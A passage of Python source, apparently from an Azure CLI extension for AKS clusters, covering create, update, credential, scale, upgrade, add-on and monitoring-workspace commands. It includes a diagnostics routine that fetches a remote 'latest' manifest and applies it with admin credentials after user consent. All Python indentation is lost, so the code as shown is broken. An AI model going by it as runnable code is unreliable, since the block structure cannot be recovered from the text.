mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = get_aks_custom_headers(aks_custom_headers)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
logger.info('AKS cluster is creating, please wait...')
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
created_cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(created_cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(created_cluster, cmd)
else:
created_cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers).result()
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if created_cluster.identity_profile is None or \
created_cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = created_cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
aks_custom_headers=None):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile and \
not uptime_sla and \
not enable_aad and \
not update_aad_profile:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance, custom_headers=headers)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_fqdn = fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Stroage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. If you only want to upgrade the node version please use the "--node-image-only" option only.')
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation can only be applied on VirtualMachineScaleSets cluster.')
_upgrade_single_agent_pool_node_image(agent_pool_client, resource_group_name, name, agent_pool_profile, no_wait)
return None
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _upgrade_single_agent_pool_node_image(client, resource_group_name, cluster_name, agent_pool_profile, no_wait):
instance = client.get(resource_group_name, cluster_name, agent_pool_profile.name)
instance.node_image_version = 'latest'
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, agent_pool_profile.name, instance)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None,
appgw_subnet_id=None, appgw_watch_namespace=None, disable_sgxquotehelper=False):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "true"})
if disable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "false"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
